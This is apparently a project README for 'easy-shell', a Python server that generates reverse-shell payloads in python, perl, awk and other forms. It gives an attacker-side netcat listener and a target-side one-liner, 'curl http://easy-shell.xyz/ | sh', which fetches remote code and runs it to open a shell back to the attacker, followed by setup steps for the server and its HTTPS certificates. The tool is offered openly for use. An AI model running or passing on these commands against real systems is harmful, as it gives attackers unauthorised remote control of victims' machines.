easy-shell icon indicating copy to clipboard operation
easy-shell copied to clipboard

A pure Python script to easily get a reverse shell


A pure Python script to easily get a reverse shell.

How it works?

After sending a request, it generates a payload with different commands available to get a reverse shell (python, perl, awk, and more).


Attacker machine
$ whoami

$ nc -l 8080
sh-4.4$ whoami
sh-4.4$ pwd
Target machine
$ whoami

$ curl http://easy-shell.xyz/ | sh

Running the server

Edit the following lines on easy_shell.py according to your needs:

PORT = 8080
DOMAIN = "{}".format(str(PORT))

HTTPS = False
KEY_FILE = "keyfile.key"
CERT_FILE = "certfile.cert"

If you want to run it over HTTPS, execute the following commands:

$ openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key
$ openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert

Used modules


This project is licensed under the 3-Clause BSD License.